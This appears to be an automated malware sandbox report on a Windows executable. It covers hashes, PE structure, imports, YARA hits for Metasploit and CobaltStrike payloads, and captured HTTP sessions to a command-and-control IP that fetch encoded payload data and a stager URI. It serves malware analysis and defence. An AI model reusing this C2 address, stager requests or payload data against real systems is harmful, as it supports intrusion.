                                                                                                                                                                                                                          SSDEEP:24576:idX8vuNxBoVnCBuwJBNMsSLvZCRX3fp8Ri8dmxvSZX0ypnBl:g+quw5pKZC9l8HBl
                                                                                                                                                                                                                          MD5:60606071BF033275377FD66A2A7DE09C
                                                                                                                                                                                                                          SHA1:2475CDFD25427BE07B3662E99C185CC49DF35C6E
                                                                                                                                                                                                                          SHA-256:4EACE6C996A2ED322BD43810DB9FB64E20114682F4B71FCD4031215F803F5F47
                                                                                                                                                                                                                          SHA-512:BF9FBE3D162388BE71D866A818F0F583FFB479FA151E62125FF200D40902E6AB1E61822E85CA01C319A1304FD899390ECC7D9BA3B3B061EAC84CD23D644B699E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1138456
                                                                                                                                                                                                                          Entropy (8bit):5.4617453207817395
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:FrEHdcM6hbaCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcQoC:FrEX/Cjfk7bPNfv42BN6yzUQoC
                                                                                                                                                                                                                          MD5:098CC6AD04199442C3E2A60E1243C2DC
                                                                                                                                                                                                                          SHA1:4C92C464A8E1E56E1C4D77CD30A0DA474A026AAF
                                                                                                                                                                                                                          SHA-256:64A162D6B11BA10CB11509F3CC445F17BEB7ACFD064F030B4D59FAA1C9894B29
                                                                                                                                                                                                                          SHA-512:73C28488B42A0BC2F0D2861FED3F5DCCCF8959CE19D3121C13C998DB496F2822DEB40F36F86240C8D3954FD2DC2BA5D63C8A125B62324DCD92FB6C8BA49FF170
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                                                          Entropy (8bit):4.465604975916049
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:+IXfpi67eLPU9skLmb0b4PWSPKaJG8nAgejZMMhA2gX4WABl0uNldwBCswSbt:TXD94PWlLZMM6YFHf+t
                                                                                                                                                                                                                          MD5:3824E1A1246624A93EC99E14F3E7ABAA
                                                                                                                                                                                                                          SHA1:F6200D862E1DBEDDDC1E60BA4757185F776EC91A
                                                                                                                                                                                                                          SHA-256:BDF6224C0D21538A8BE2CDA969A4F5E5A9DECC9BCA6A8E637604E32E04A95A47
                                                                                                                                                                                                                          SHA-512:3437D300E3997BA38487B8406A6FD15AE9E8E96925549C5993EEFF2DF259C051EF81C41B1AEF1AA797E8202B45A3CF47B2D4C3E6D82173E10C471BC989EF3759
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):7.9960498818233
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                                          • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                                          • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                                          File name:DChOtFdp9T.exe
                                                                                                                                                                                                                          File size:17'118'166 bytes
                                                                                                                                                                                                                          MD5:8ee41e146f682cfed19648f1ccb68bfa
                                                                                                                                                                                                                          SHA1:a49dc5ca5ac1cd8311a04804aed8d57c572974a2
                                                                                                                                                                                                                          SHA256:bf1b7e92893315f4c17394356ff7418fb6ef80a8cfc8e43d7905e8f2230fb77e
                                                                                                                                                                                                                          SHA512:c68c10e709feb5592d1583b33d1d9d9c697d4c80e46339e790946f3941b0622e334883e04f6c627d8e2e4f27a60bbc805020125b2d2bdc778c6ad612088c4645
                                                                                                                                                                                                                          SSDEEP:393216:E9YiR/Um2a63hucsXMCHWUjPodaI8CKh1UlLT5aQsP:E9YiRsmW3hrsXMb8PDINKhW
                                                                                                                                                                                                                          TLSH:F907335AA96110EBEDFB45368AF686164263BC181760CE9F43F675231E330D61E3CF62
                                                                                                                                                                                                                          Icon Hash:0d098ea7331b8f07
                                                                                                                                                                                                                          Entrypoint:0x14000be20
                                                                                                                                                                                                                          Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6745D0F5 [Tue Nov 26 13:45:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:2
File Version Major:5
File Version Minor:2
Subsystem Version Major:5
Subsystem Version Minor:2
Import Hash:2ac23c52e7647c5bbea38e98bb68c652

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3b67c | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x48000 | 0x19a04 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x45000 | 0x21c0 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x62000 | 0x768 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x38d80 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x38c40 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2a000 | 0x440 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x28f60 | 0x29000 | de5b7deeb13436557c4ba84aa3d5b3fb | False | 0.5521805926067073 | data | 6.482403760023359 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2a000 | 0x12510 | 0x12600 | 811c2ae4328dc8cd01ab200a32011a5e | False | 0.5267325680272109 | DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 33554432.000000, slope 8.019287 | 5.760805036098361 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3d000 | 0x73c8 | 0xe00 | 8013c58834a08435a779ff436ff10eb7 | False | 0.134765625 | data | 1.8346765722623417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x45000 | 0x21c0 | 0x2200 | d16e38966953c987eb484ac72e115d6c | False | 0.48678768382352944 | data | 5.427654805721976 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x48000 | 0x1a000 | 0x19c00 | cb5fdc6bf627c2b091f13f6e2e8c020d | False | 0.5083150030339806 | data | 6.981894463244789 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x62000 | 0x768 | 0x800 | be4464056c7d34453c1e26c7294816ee | False | 0.556640625 | data | 5.2849802082305075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x48208 | 0x7773 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | Chinese | China | 0.9949965662709703
RT_ICON | 0x4f97c | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | Chinese | China | 0.25225982762245114
RT_ICON | 0x58e24 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | Chinese | China | 0.3050307038261691
RT_ICON | 0x5d04c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Chinese | China | 0.3629668049792531
RT_ICON | 0x5f5f4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Chinese | China | 0.48592870544090055
RT_ICON | 0x6069c | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Chinese | China | 0.6155737704918033
RT_ICON | 0x61024 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Chinese | China | 0.7092198581560284
RT_GROUP_ICON | 0x6148c | 0x68 | data | Chinese | China | 0.7692307692307693
RT_MANIFEST | 0x614f4 | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, FormatMessageW, GetModuleFileNameW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, GetEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, WaitForSingleObject, Sleep, GetCurrentProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, LocalFree, SetConsoleCtrlHandler, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, ExpandEnvironmentStringsW, QueryPerformanceCounter, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Language of compilation system | Country where language is spoken | Map
Chinese | China |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
• 101.42.238.250
• 101.42.238.250:443

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 101.42.238.250 | 80 | 4020 | C:\Users\user\Desktop\DChOtFdp9T.exe
Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 01:37:03.028170109 CET | 150 | OUT | GET /a.txt HTTP/1.1
Host: 101.42.238.250
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Dec 31, 2024 01:37:03.945593119 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 00:37:03 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 26 Nov 2024 13:30:20 GMT
ETag: "673f-627d0d9c435be"
Accept-Ranges: bytes
Content-Length: 26431
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=GB2312.ZH-CN.zh-cn
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.948121071 CET1236INData Raw: 37 32 30 5f 37 32 31 5f 37 31 34 5f 37 34 33 5f 37 32 30 5f 37 35 31 5f 37 34 38 5f 37 34 39 5f 37 34 31 5f 37 35 38 5f 37 35 30 5f 37 35 37 5f 37 32 30 5f 37 30 39 5f 36 35 39 5f 37 34 36 5f 36 37 30 5f 37 32 32 5f 37 33 38 5f 37 32 37 5f 37 30
                                                                                                                                                                                                                          Data Ascii: 720_721_714_743_720_751_748_749_741_758_750_757_720_709_659_746_670_722_738_727_706_744_653_747_657_744_722_662_738_723_714_709_753_714_738_712_753_752_738_662_750_756_727_660_671_660_684_719_757_720_718_736_723_663_746_657_709_713_722_741_715
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.950146914 CET1236INData Raw: 36 35 39 5f 37 32 34 5f 37 30 36 5f 37 34 36 5f 37 34 30 5f 37 35 34 5f 37 35 33 5f 37 33 32 5f 36 36 31 5f 36 36 32 5f 37 34 39 5f 37 33 35 5f 37 35 31 5f 37 32 35 5f 36 35 36 5f 36 35 39 5f 36 37 31 5f 37 34 38 5f 36 35 33 5f 37 32 34 5f 36 35
                                                                                                                                                                                                                          Data Ascii: 659_724_706_746_740_754_753_732_661_662_749_735_751_725_656_659_671_748_653_724_657_758_757_736_713_656_719_759_726_746_756_663_751_659_756_735_732_716_713_656_661_744_749_735_725_661_659_744_752_656_726_749_732_736_722_747_714_723_737_749_657
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.950159073 CET328INData Raw: 36 35 33 5f 37 31 34 5f 37 31 35 5f 37 33 38 5f 36 37 30 5f 37 33 32 5f 37 34 33 5f 37 33 36 5f 37 35 39 5f 37 33 35 5f 36 37 30 5f 37 33 38 5f 37 30 37 5f 36 38 34 5f 37 32 30 5f 37 30 37 5f 37 31 32 5f 36 34 39 5f 37 33 34 5f 37 34 37 5f 37 32
                                                                                                                                                                                                                          Data Ascii: 653_714_715_738_670_732_743_736_759_735_670_738_707_684_720_707_712_649_734_747_726_746_721_751_713_713_724_756_735_734_749_750_755_711_653_759_662_736_658_767_714_751_751_711_758_759_738_738_706_657_741_744_661_735_720_741_670_718_649_657_734
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.950169086 CET1236INData Raw: 37 35 34 5f 37 34 35 5f 37 33 39 5f 36 35 37 5f 37 32 36 5f 37 33 37 5f 37 32 37 5f 36 37 31 5f 37 34 30 5f 37 30 39 5f 37 34 34 5f 37 33 39 5f 37 35 35 5f 37 30 36 5f 37 34 33 5f 37 30 34 5f 37 32 32 5f 37 32 34 5f 37 33 32 5f 36 35 36 5f 37 33
                                                                                                                                                                                                                          Data Ascii: 754_745_739_657_726_737_727_671_740_709_744_739_755_706_743_704_722_724_732_656_735_722_741_660_705_719_750_749_705_714_766_719_759_743_660_659_756_757_649_721_722_746_719_659_715_741_767_757_707_739_717_747_757_756_750_748_754_660_748_715_653
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.952073097 CET224INData Raw: 37 35 35 5f 37 32 37 5f 37 33 36 5f 37 35 34 5f 37 33 38 5f 37 30 37 5f 36 36 31 5f 37 31 34 5f 37 32 37 5f 36 35 36 5f 37 35 35 5f 37 35 36 5f 36 38 34 5f 37 35 32 5f 36 36 30 5f 37 34 37 5f 37 31 31 5f 37 31 36 5f 37 35 38 5f 37 32 34 5f 37 31
                                                                                                                                                                                                                          Data Ascii: 755_727_736_754_738_707_661_714_727_656_755_756_684_752_660_747_711_716_758_724_711_711_726_726_657_663_713_736_649_737_735_723_726_759_716_747_712_662_719_743_739_661_767_745_740_745_711_715_725_711_714_663_748_748_753_656_
                                                                                                                                                                                                                          Dec 31, 2024 01:37:03.953210115 CET1236INData Raw: 37 35 36 5f 37 33 37 5f 37 32 34 5f 37 30 36 5f 37 35 37 5f 37 35 37 5f 36 35 37 5f 36 34 39 5f 37 33 38 5f 37 33 38 5f 37 33 36 5f 37 34 39 5f 37 32 35 5f 37 32 32 5f 36 35 33 5f 37 30 35 5f 36 35 39 5f 36 36 32 5f 37 34 35 5f 37 36 37 5f 37 34
                                                                                                                                                                                                                          Data Ascii: 756_737_724_706_757_757_657_649_738_738_736_749_725_722_653_705_659_662_745_767_744_684_662_748_718_718_766_746_749_715_744_661_756_704_707_744_743_721_714_737_717_670_732_751_740_660_707_718_748_708_756_720_737_736_718_747_740_748_741_736_756


Session ID:1
Source IP:192.168.2.4
Source Port:49732
Destination IP:101.42.238.250
Destination Port:80
PID:4020
Process:C:\Users\user\Desktop\DChOtFdp9T.exe

Timestamp:Dec 31, 2024 01:37:04.279326916 CET
Bytes transferred:150
Direction:OUT
Data:
GET /b.txt HTTP/1.1
Host: 101.42.238.250
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Timestamp:Dec 31, 2024 01:37:05.149616957 CET
Bytes transferred:1236
Direction:IN
Data:
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 00:37:04 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 26 Nov 2024 13:42:57 GMT
ETag: "7ee-627d106eaf8a2"
Accept-Ranges: bytes
Content-Length: 2030
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=GB2312.ZH-CN.zh-cn


Session ID:2
Source IP:192.168.2.4
Source Port:49733
Destination IP:101.42.238.250
Destination Port:443
PID:4020
Process:C:\Users\user\Desktop\DChOtFdp9T.exe

Timestamp:Dec 31, 2024 01:37:05.205416918 CET
Bytes transferred:161
Direction:OUT
Data:
GET /Ye3l HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: 101.42.238.250:443
Connection: Keep-Alive
Cache-Control: no-cache


                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:19:36:58
                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\DChOtFdp9T.exe"
                                                                                                                                                                                                                          Imagebase:0x7ff602990000
                                                                                                                                                                                                                          File size:17'118'166 bytes
                                                                                                                                                                                                                          MD5 hash:8EE41E146F682CFED19648F1CCB68BFA
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                          Start time:19:37:01
                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\DChOtFdp9T.exe"
                                                                                                                                                                                                                          Imagebase:0x7ff602990000
                                                                                                                                                                                                                          File size:17'118'166 bytes
                                                                                                                                                                                                                          MD5 hash:8EE41E146F682CFED19648F1CCB68BFA
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

Target ID:4
Start time:19:37:04
Start date:30/12/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -u -p 4020 -s 1316
Imagebase:0x7ff682550000
File size:570'736 bytes
MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Execution Graph

Execution Coverage:10.6%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:18.9%
Total number of Nodes:2000
Total number of Limit Nodes:78
7ff60299c328 GetModuleHandleW 16816->16911 16817 7ff602993736 17149 7ff602993f50 16817->17149 16818 7ff60299356c 16820 7ff602991bf0 49 API calls 16818->16820 16834 7ff602993588 16820->16834 16822 7ff602993785 16823 7ff6029925f0 53 API calls 16822->16823 16905 7ff602993538 16823->16905 16826 7ff60299365f __vcrt_freefls 16831 7ff602993834 16826->16831 16835 7ff602997d60 14 API calls 16826->16835 16827 7ff602993778 16828 7ff60299379f 16827->16828 16829 7ff60299377d 16827->16829 16830 7ff602991bf0 49 API calls 16828->16830 17168 7ff60299f0bc 16829->17168 16833 7ff6029937be 16830->16833 16858 7ff602993805 __vcrt_freefls 16831->16858 17172 7ff602993e70 16831->17172 16843 7ff6029918f0 115 API calls 16833->16843 17020 7ff602997d60 16834->17020 16837 7ff6029936ae 16835->16837 17033 7ff602997ed0 16837->17033 16838 7ff602993852 16840 7ff602993871 16838->16840 16841 7ff602993865 16838->16841 16842 7ff602991bf0 49 API calls 16840->16842 17175 7ff602993fc0 16841->17175 16842->16858 16846 7ff6029937df 16843->16846 16844 7ff6029936bd 16847 7ff60299380f 16844->16847 16851 7ff6029936cf 16844->16851 16846->16834 16850 7ff6029937ef 16846->16850 17042 7ff602998160 16847->17042 16854 7ff6029925f0 53 API calls 16850->16854 17038 7ff602991bf0 16851->17038 16853 7ff60299389e SetDllDirectoryW 16861 7ff6029938c3 16853->16861 16854->16905 17093 7ff602998410 16858->17093 16859 7ff6029936fc 17138 7ff6029925f0 16859->17138 16863 7ff602993a38 16861->16863 17098 7ff602996530 16861->17098 16866 7ff602993a42 PostMessageW GetMessageW 16863->16866 16867 7ff602993a65 16863->16867 16866->16867 17232 7ff602993080 16867->17232 16869 7ff6029938ea 16871 7ff602993947 16869->16871 16873 7ff602993901 16869->16873 17178 7ff602996570 16869->17178 16871->16863 16877 7ff60299395c 16871->16877 16885 7ff602993905 16873->16885 17199 7ff602996910 16873->17199 17118 7ff6029930e0 16877->17118 16881 7ff602996750 FreeLibrary 16884 7ff602993a8b 16881->16884 16885->16871 17215 7ff602992870 16885->17215 16905->16814 16907 
7ff6029a89e4 16906->16907 16908 7ff6029a89c3 16906->16908 16909 7ff6029a9258 45 API calls 16907->16909 16908->16787 16910 7ff6029a89e9 16909->16910 16912 7ff60299c339 16911->16912 16912->16795 16914 7ff60299c011 16913->16914 16915 7ff60299bdd0 16914->16915 16916 7ff60299c8f8 7 API calls 16914->16916 16915->16785 16916->16915 16918 7ff60299c1c2 _isindst memcpy_s 16917->16918 16919 7ff60299c1e1 RtlCaptureContext RtlLookupFunctionEntry 16918->16919 16920 7ff60299c246 memcpy_s 16919->16920 16921 7ff60299c20a RtlVirtualUnwind 16919->16921 16922 7ff60299c278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16920->16922 16921->16920 16923 7ff60299c2c6 _isindst 16922->16923 16923->16783 16925 7ff60299c900 16924->16925 16926 7ff60299c90a 16924->16926 16930 7ff60299cc94 16925->16930 16926->16801 16931 7ff60299c905 16930->16931 16932 7ff60299cca3 16930->16932 16934 7ff60299cd00 16931->16934 16938 7ff60299ced0 16932->16938 16935 7ff60299cd2b 16934->16935 16936 7ff60299cd2f 16935->16936 16937 7ff60299cd0e DeleteCriticalSection 16935->16937 16936->16926 16937->16935 16942 7ff60299cd38 16938->16942 16948 7ff60299ce22 TlsFree 16942->16948 16949 7ff60299cd7c __vcrt_InitializeCriticalSectionEx 16942->16949 16943 7ff60299cdaa LoadLibraryExW 16945 7ff60299ce49 16943->16945 16946 7ff60299cdcb GetLastError 16943->16946 16944 7ff60299ce69 GetProcAddress 16944->16948 16945->16944 16947 7ff60299ce60 FreeLibrary 16945->16947 16946->16949 16947->16944 16949->16943 16949->16944 16949->16948 16950 7ff60299cded LoadLibraryExW 16949->16950 16950->16945 16950->16949 16952 7ff6029ae300 16951->16952 16954 7ff6029ae3a6 16952->16954 16955 7ff6029ae353 16952->16955 16953 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 16957 7ff6029ae37c 16953->16957 17245 7ff6029ae1d8 16954->17245 16955->16953 16957->16810 17253 7ff60299b8c0 16958->17253 16961 7ff602993438 17255 7ff602998300 FindFirstFileExW 16961->17255 16962 7ff60299341b 17260 7ff6029929e0 16962->17260 16966 7ff6029934a5 
